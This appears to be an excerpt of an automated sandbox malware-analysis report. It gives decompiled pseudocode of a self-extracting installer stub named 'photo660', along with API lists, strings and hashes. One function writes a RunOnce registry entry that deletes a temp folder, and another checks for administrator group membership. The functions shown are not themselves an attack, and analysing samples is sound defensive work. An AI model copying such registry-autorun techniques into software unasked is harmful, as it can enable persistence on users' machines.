                                                                                                                                                                                                        0x00bc45d2
                                                                                                                                                                                                        0x00bc45d2
                                                                                                                                                                                                        0x00bc45d4
                                                                                                                                                                                                        0x00bc45d5
                                                                                                                                                                                                        0x00bc45db
                                                                                                                                                                                                        0x00bc45de
                                                                                                                                                                                                        0x00bc45e3
                                                                                                                                                                                                        0x00bc45e9
                                                                                                                                                                                                        0x00bc45ed
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc45f3
                                                                                                                                                                                                        0x00bc45fd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc4602
                                                                                                                                                                                                        0x00bc45ed
                                                                                                                                                                                                        0x00bc457e
                                                                                                                                                                                                        0x00bc457e
                                                                                                                                                                                                        0x00bc4580
                                                                                                                                                                                                        0x00bc4580
                                                                                                                                                                                                        0x00bc4583
                                                                                                                                                                                                        0x00bc4583
                                                                                                                                                                                                        0x00bc4585
                                                                                                                                                                                                        0x00bc4586
                                                                                                                                                                                                        0x00bc458a
                                                                                                                                                                                                        0x00bc458c
                                                                                                                                                                                                        0x00bc458f
                                                                                                                                                                                                        0x00bc458f
                                                                                                                                                                                                        0x00bc4591
                                                                                                                                                                                                        0x00bc4592
                                                                                                                                                                                                        0x00bc459b
                                                                                                                                                                                                        0x00bc459e
                                                                                                                                                                                                        0x00bc45a3
                                                                                                                                                                                                        0x00bc45a9
                                                                                                                                                                                                        0x00bc45ad
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc45af
                                                                                                                                                                                                        0x00bc45af
                                                                                                                                                                                                        0x00bc45bf
                                                                                                                                                                                                        0x00bc462d
                                                                                                                                                                                                        0x00bc4630
                                                                                                                                                                                                        0x00bc463d
                                                                                                                                                                                                        0x00bc464e
                                                                                                                                                                                                        0x00bc464e
                                                                                                                                                                                                        0x00bc463f
                                                                                                                                                                                                        0x00bc4640
                                                                                                                                                                                                        0x00bc4647
                                                                                                                                                                                                        0x00bc464c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc464c
                                                                                                                                                                                                        0x00bc4666
                                                                                                                                                                                                        0x00bc466d
                                                                                                                                                                                                        0x00bc466f
                                                                                                                                                                                                        0x00bc4675
                                                                                                                                                                                                        0x00bc4675
                                                                                                                                                                                                        0x00bc45ad
                                                                                                                                                                                                        0x00bc4527
                                                                                                                                                                                                        0x00bc452e
                                                                                                                                                                                                        0x00bc453f
                                                                                                                                                                                                        0x00bc453f
                                                                                                                                                                                                        0x00bc4530
                                                                                                                                                                                                        0x00bc4531
                                                                                                                                                                                                        0x00bc4538
                                                                                                                                                                                                        0x00bc453d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc453d
                                                                                                                                                                                                        0x00bc4554
                                                                                                                                                                                                        0x00bc455a
                                                                                                                                                                                                        0x00bc455a
                                                                                                                                                                                                        0x00bc455a
                                                                                                                                                                                                        0x00bc4525
                                                                                                                                                                                                        0x00bc468c

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00BC4518
                                                                                                                                                                                                        • MessageBoxA.USER32(?,?,photo660,00010010), ref: 00BC4554
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000065), ref: 00BC45A3
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000065), ref: 00BC45E3
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000002), ref: 00BC460D
                                                                                                                                                                                                        • MessageBeep.USER32(00000000), ref: 00BC4630
                                                                                                                                                                                                        • MessageBoxA.USER32(?,00000000,photo660,00000000), ref: 00BC4666
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00BC466F
                                                                                                                                                                                                          • Part of subcall function 00BC681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00BC686E
                                                                                                                                                                                                          • Part of subcall function 00BC681F: GetSystemMetrics.USER32(0000004A), ref: 00BC68A7
                                                                                                                                                                                                          • Part of subcall function 00BC681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00BC68CC
                                                                                                                                                                                                          • Part of subcall function 00BC681F: RegQueryValueExA.ADVAPI32(?,00BC1140,00000000,?,?,0000000C), ref: 00BC68F4
                                                                                                                                                                                                          • Part of subcall function 00BC681F: RegCloseKey.ADVAPI32(?), ref: 00BC6902
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                        • String ID: LoadString() Error. Could not load string resource.$photo660
                                                                                                                                                                                                        • API String ID: 3244514340-1652614573
                                                                                                                                                                                                        • Opcode ID: 28409bfa97b01fdf31dd3b4dbee1564dbb511fe3ae7b49d791ac81efb82eb666
                                                                                                                                                                                                        • Instruction ID: 7a568ea70bb2ff133e683f220207a4ec08ceb50276b19582f780f16d9bf563ac
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 28409bfa97b01fdf31dd3b4dbee1564dbb511fe3ae7b49d791ac81efb82eb666
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C551D272900219ABDB219F28CC58FAA7BE9EF4A304F1445E9FD49B7245DB31DE05CB60
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC2773 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 114registryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E00BC2773(CHAR* __ecx, char* _a4) {
				signed int _v8;
				char _v268;
				char _v269;
				CHAR* _v276;
				int _v280;
				void* _v284;
				int _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				intOrPtr _t34;
				int _t45;
				int* _t50;
				CHAR* _t52;
				CHAR* _t61;
				char* _t62;
				int _t63;
				CHAR* _t64;
				signed int _t65;

				_t52 = __ecx;
				_t23 =  *0xbc8004; // 0x9f7d84ca
				_v8 = _t23 ^ _t65;
				_t62 = _a4;
				_t50 = 0;
				_t61 = __ecx;
				_v276 = _t62;
				 *((char*)(__ecx)) = 0;
				if( *_t62 != 0x23) {
					_t63 = 0x104;
					goto L14;
				} else {
					_t64 = _t62 + 1;
					_v269 = CharUpperA( *_t64);
					_v276 = CharNextA(CharNextA(_t64));
					_t63 = 0x104;
					_t34 = _v269;
					if(_t34 == 0x53) {
						L14:
						GetSystemDirectoryA(_t61, _t63);
						goto L15;
					} else {
						if(_t34 == 0x57) {
							GetWindowsDirectoryA(_t61, 0x104);
							goto L16;
						} else {
							_push(_t52);
							_v288 = 0x104;
							E00BC1781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
							_t59 = 0x104;
							E00BC658A( &_v268, 0x104, _v276);
							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
								L16:
								_t59 = _t63;
								E00BC658A(_t61, _t63, _v276);
							} else {
								if(RegQueryValueExA(_v284, 0xbc1140, 0,  &_v280, _t61,  &_v288) == 0) {
									_t45 = _v280;
									if(_t45 != 2) {
										L9:
										if(_t45 == 1) {
											goto L10;
										}
									} else {
										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
											_t45 = _v280;
											goto L9;
										} else {
											_t59 = 0x104;
											E00BC1680(_t61, 0x104,  &_v268);
											L10:
											_t50 = 1;
										}
									}
								}
								RegCloseKey(_v284);
								L15:
								if(_t50 == 0) {
									goto L16;
								}
							}
						}
					}
				}
				return E00BC6CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
			}























                                                                                                                                                                                                        0x00bc2773
                                                                                                                                                                                                        0x00bc277e
                                                                                                                                                                                                        0x00bc2785
                                                                                                                                                                                                        0x00bc278a
                                                                                                                                                                                                        0x00bc278d
                                                                                                                                                                                                        0x00bc2790
                                                                                                                                                                                                        0x00bc2792
                                                                                                                                                                                                        0x00bc2798
                                                                                                                                                                                                        0x00bc279d
                                                                                                                                                                                                        0x00bc28b2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc27a3
                                                                                                                                                                                                        0x00bc27a3
                                                                                                                                                                                                        0x00bc27af
                                                                                                                                                                                                        0x00bc27c2
                                                                                                                                                                                                        0x00bc27c8
                                                                                                                                                                                                        0x00bc27cd
                                                                                                                                                                                                        0x00bc27d5
                                                                                                                                                                                                        0x00bc28b7
                                                                                                                                                                                                        0x00bc28b9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc27db
                                                                                                                                                                                                        0x00bc27dd
                                                                                                                                                                                                        0x00bc28aa
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc27e3
                                                                                                                                                                                                        0x00bc27e3
                                                                                                                                                                                                        0x00bc27ec
                                                                                                                                                                                                        0x00bc27f8
                                                                                                                                                                                                        0x00bc2803
                                                                                                                                                                                                        0x00bc280b
                                                                                                                                                                                                        0x00bc2831
                                                                                                                                                                                                        0x00bc28c3
                                                                                                                                                                                                        0x00bc28c9
                                                                                                                                                                                                        0x00bc28cd
                                                                                                                                                                                                        0x00bc2837
                                                                                                                                                                                                        0x00bc285a
                                                                                                                                                                                                        0x00bc285c
                                                                                                                                                                                                        0x00bc2865
                                                                                                                                                                                                        0x00bc2892
                                                                                                                                                                                                        0x00bc2895
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc2867
                                                                                                                                                                                                        0x00bc2878
                                                                                                                                                                                                        0x00bc288c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc287a
                                                                                                                                                                                                        0x00bc2880
                                                                                                                                                                                                        0x00bc2885
                                                                                                                                                                                                        0x00bc2897
                                                                                                                                                                                                        0x00bc2899
                                                                                                                                                                                                        0x00bc2899
                                                                                                                                                                                                        0x00bc2878
                                                                                                                                                                                                        0x00bc2865
                                                                                                                                                                                                        0x00bc28a0
                                                                                                                                                                                                        0x00bc28bf
                                                                                                                                                                                                        0x00bc28c1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc28c1
                                                                                                                                                                                                        0x00bc2831
                                                                                                                                                                                                        0x00bc27dd
                                                                                                                                                                                                        0x00bc27d5
                                                                                                                                                                                                        0x00bc28e5

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharUpperA.USER32(9F7D84CA,00000000,00000000,00000000), ref: 00BC27A8
                                                                                                                                                                                                        • CharNextA.USER32(0000054D), ref: 00BC27B5
                                                                                                                                                                                                        • CharNextA.USER32(00000000), ref: 00BC27BC
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00BC2829
                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,00BC1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00BC2852
                                                                                                                                                                                                        • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00BC2870
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00BC28A0
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 00BC28AA
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00BC28B9
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00BC27E4
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                        • API String ID: 2659952014-2428544900
                                                                                                                                                                                                        • Opcode ID: ddf0b68db5bc01336574cf5beec5b4a12c064ee6901ca69095d426771ae98f92
                                                                                                                                                                                                        • Instruction ID: 23d76105c2efd06fb2278b35f226a90e56fbf50af8859ce4e9463bd6e90be633
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ddf0b68db5bc01336574cf5beec5b4a12c064ee6901ca69095d426771ae98f92
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 77417E71A0012CAFDB249B649C85FEA7BFDEF5A740F1440E9E549E2111DB708E868BA1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC2267 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 88registryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 62%
                                                                                                                                                                                                        			E00BC2267() {
				signed int _v8;
				char _v268;
				char _v836;
				void* _v840;
				int _v844;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				intOrPtr _t33;
				void* _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t47;
				void* _t49;
				signed int _t51;

				_t19 =  *0xbc8004; // 0x9f7d84ca
				_t20 = _t19 ^ _t51;
				_v8 = _t19 ^ _t51;
				if( *0xbc8530 != 0) {
					_push(_t49);
					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
						_push(_t38);
						_v844 = 0x238;
						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
							_push(_t47);
							memset( &_v268, 0, 0x104);
							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
								E00BC658A( &_v268, 0x104, 0xbc1140);
							}
							_push("C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
							E00BC171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
							_t42 =  &_v836;
							_t45 = _t42 + 1;
							_pop(_t47);
							do {
								_t33 =  *_t42;
								_t42 = _t42 + 1;
							} while (_t33 != 0);
							RegSetValueExA(_v840, "wextract_cleanup2", 0, 1,  &_v836, _t42 - _t45 + 1);
						}
						_t20 = RegCloseKey(_v840);
						_pop(_t38);
					}
					_pop(_t49);
				}
				return E00BC6CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
			}



















                                                                                                                                                                                                        0x00bc2272
                                                                                                                                                                                                        0x00bc2277
                                                                                                                                                                                                        0x00bc2279
                                                                                                                                                                                                        0x00bc2283
                                                                                                                                                                                                        0x00bc2289
                                                                                                                                                                                                        0x00bc22ab
                                                                                                                                                                                                        0x00bc22b1
                                                                                                                                                                                                        0x00bc22c4
                                                                                                                                                                                                        0x00bc22e0
                                                                                                                                                                                                        0x00bc22e6
                                                                                                                                                                                                        0x00bc22f5
                                                                                                                                                                                                        0x00bc230d
                                                                                                                                                                                                        0x00bc231c
                                                                                                                                                                                                        0x00bc231c
                                                                                                                                                                                                        0x00bc2321
                                                                                                                                                                                                        0x00bc233a
                                                                                                                                                                                                        0x00bc2342
                                                                                                                                                                                                        0x00bc2348
                                                                                                                                                                                                        0x00bc234b
                                                                                                                                                                                                        0x00bc234c
                                                                                                                                                                                                        0x00bc234c
                                                                                                                                                                                                        0x00bc234e
                                                                                                                                                                                                        0x00bc234f
                                                                                                                                                                                                        0x00bc236e
                                                                                                                                                                                                        0x00bc236e
                                                                                                                                                                                                        0x00bc237a
                                                                                                                                                                                                        0x00bc2380
                                                                                                                                                                                                        0x00bc2380
                                                                                                                                                                                                        0x00bc2381
                                                                                                                                                                                                        0x00bc2381
                                                                                                                                                                                                        0x00bc238f

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 00BC22A3
                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000000,?,?,00000001), ref: 00BC22D8
                                                                                                                                                                                                        • memset.MSVCRT ref: 00BC22F5
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00BC2305
                                                                                                                                                                                                        • RegSetValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 00BC236E
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00BC237A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • wextract_cleanup2, xrefs: 00BC227C, 00BC22CD, 00BC2363
                                                                                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00BC2299
                                                                                                                                                                                                        • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00BC232D
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00BC2321
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup2
                                                                                                                                                                                                        • API String ID: 3027380567-2274915764
                                                                                                                                                                                                        • Opcode ID: c95e9242cc74dd4df221635fda105a7147eef18e3e2059808fe9768b79744d02
                                                                                                                                                                                                        • Instruction ID: 4695b1d111742331477e7c44a9be416b4b8b03447e731c712ec630d4cde72de5
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c95e9242cc74dd4df221635fda105a7147eef18e3e2059808fe9768b79744d02
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2C31C371A00218ABDB219B65DC49FEB7BBCEB59744F0401EDB50DA6051EE70AF88CA60
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC3100 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 70windowCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 87%
                                                                                                                                                                                                        			E00BC3100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t8;
				void* _t11;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t33;
				struct HWND__* _t34;

				_t8 = _a8 - 0xf;
				if(_t8 == 0) {
					if( *0xbc8590 == 0) {
						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
						 *0xbc8590 = 1;
					}
					L13:
					return 0;
				}
				_t11 = _t8 - 1;
				if(_t11 == 0) {
					L7:
					_push(0);
					L8:
					EndDialog(_a4, ??);
					L9:
					return 1;
				}
				_t15 = _t11 - 0x100;
				if(_t15 == 0) {
					_t16 = GetDesktopWindow();
					_t33 = _a4;
					E00BC43D0(_t33, _t16);
					SetDlgItemTextA(_t33, 0x834,  *0xbc8d4c);
					SetWindowTextA(_t33, "photo660");
					SetForegroundWindow(_t33);
					_t34 = GetDlgItem(_t33, 0x834);
					 *0xbc88b8 = GetWindowLongA(_t34, 0xfffffffc);
					SetWindowLongA(_t34, 0xfffffffc, E00BC30C0);
					return 1;
				}
				if(_t15 != 1) {
					goto L13;
				}
				if(_a12 != 6) {
					if(_a12 != 7) {
						goto L9;
					}
					goto L7;
				}
				_push(1);
				goto L8;
			}









                                                                                                                                                                                                        0x00bc3108
                                                                                                                                                                                                        0x00bc310b
                                                                                                                                                                                                        0x00bc31b7
                                                                                                                                                                                                        0x00bc31ca
                                                                                                                                                                                                        0x00bc31d0
                                                                                                                                                                                                        0x00bc31d0
                                                                                                                                                                                                        0x00bc31da
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc31da
                                                                                                                                                                                                        0x00bc3111
                                                                                                                                                                                                        0x00bc3114
                                                                                                                                                                                                        0x00bc3136
                                                                                                                                                                                                        0x00bc3136
                                                                                                                                                                                                        0x00bc3138
                                                                                                                                                                                                        0x00bc313b
                                                                                                                                                                                                        0x00bc3141
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3143
                                                                                                                                                                                                        0x00bc3116
                                                                                                                                                                                                        0x00bc311b
                                                                                                                                                                                                        0x00bc314b
                                                                                                                                                                                                        0x00bc3151
                                                                                                                                                                                                        0x00bc3158
                                                                                                                                                                                                        0x00bc316a
                                                                                                                                                                                                        0x00bc3176
                                                                                                                                                                                                        0x00bc317d
                                                                                                                                                                                                        0x00bc318b
                                                                                                                                                                                                        0x00bc319e
                                                                                                                                                                                                        0x00bc31a3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc31ad
                                                                                                                                                                                                        0x00bc3120
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc312a
                                                                                                                                                                                                        0x00bc3134
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3134
                                                                                                                                                                                                        0x00bc312c
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • EndDialog.USER32(?,00000000), ref: 00BC313B
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00BC314B
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(?,00000834), ref: 00BC316A
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,photo660), ref: 00BC3176
                                                                                                                                                                                                        • SetForegroundWindow.USER32(?), ref: 00BC317D
                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000834), ref: 00BC3185
                                                                                                                                                                                                        • GetWindowLongA.USER32(00000000,000000FC), ref: 00BC3190
                                                                                                                                                                                                        • SetWindowLongA.USER32(00000000,000000FC,00BC30C0), ref: 00BC31A3
                                                                                                                                                                                                        • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 00BC31CA
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                        • String ID: photo660
                                                                                                                                                                                                        • API String ID: 3785188418-1757243477
                                                                                                                                                                                                        • Opcode ID: e9b1965c179a3e3eb5f2a00d67374fa0ae5916c2e7e8543e72141fcab22695cc
                                                                                                                                                                                                        • Instruction ID: dadae413ccd7ddacb9b2dc4656505e0d3424f76c050f82127b493e37e4c0dc8c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e9b1965c179a3e3eb5f2a00d67374fa0ae5916c2e7e8543e72141fcab22695cc
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2311B431204225BFDB115F24AC0CF9A3AE4EB4EB24F588658F915B61E0DFB58A41D786
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC18A3 Relevance: 16.6, APIs: 11, Instructions: 112memoryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 91%
                                                                                                                                                                                                        			E00BC18A3(void* __edx, void* __esi) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				char _v20;
				long _v24;
				void* _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				signed int _t23;
				long _t45;
				void* _t49;
				int _t50;
				void* _t52;
				signed int _t53;

				_t51 = __esi;
				_t49 = __edx;
				_t23 =  *0xbc8004; // 0x9f7d84ca
				_v8 = _t23 ^ _t53;
				_t25 =  *0xbc8128; // 0x2
				_t45 = 0;
				_v12 = 0x500;
				_t50 = 2;
				_v16.Value = 0;
				_v20 = 0;
				if(_t25 != _t50) {
					L20:
					return E00BC6CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
				}
				if(E00BC17EE( &_v20) != 0) {
					_t25 = _v20;
					if(_v20 != 0) {
						 *0xbc8128 = 1;
					}
					goto L20;
				}
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
					goto L20;
				}
				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
					L17:
					CloseHandle(_v28);
					_t25 = _v20;
					goto L20;
				} else {
					_push(__esi);
					_t52 = LocalAlloc(0, _v24);
					if(_t52 == 0) {
						L16:
						_pop(_t51);
						goto L17;
					}
					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
						L15:
						LocalFree(_t52);
						goto L16;
					} else {
						if( *_t52 <= 0) {
							L14:
							FreeSid(_v32);
							goto L15;
						}
						_t15 = _t52 + 4; // 0x4
						_t50 = _t15;
						while(EqualSid( *_t50, _v32) == 0) {
							_t45 = _t45 + 1;
							_t50 = _t50 + 8;
							if(_t45 <  *_t52) {
								continue;
							}
							goto L14;
						}
						 *0xbc8128 = 1;
						_v20 = 1;
						goto L14;
					}
				}
			}


















                                                                                                                                                                                                        0x00bc18a3
                                                                                                                                                                                                        0x00bc18a3
                                                                                                                                                                                                        0x00bc18ab
                                                                                                                                                                                                        0x00bc18b2
                                                                                                                                                                                                        0x00bc18b5
                                                                                                                                                                                                        0x00bc18be
                                                                                                                                                                                                        0x00bc18c0
                                                                                                                                                                                                        0x00bc18c6
                                                                                                                                                                                                        0x00bc18c7
                                                                                                                                                                                                        0x00bc18ca
                                                                                                                                                                                                        0x00bc18cf
                                                                                                                                                                                                        0x00bc19c9
                                                                                                                                                                                                        0x00bc19d8
                                                                                                                                                                                                        0x00bc19d8
                                                                                                                                                                                                        0x00bc18df
                                                                                                                                                                                                        0x00bc19b8
                                                                                                                                                                                                        0x00bc19bd
                                                                                                                                                                                                        0x00bc19bf
                                                                                                                                                                                                        0x00bc19bf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc19bd
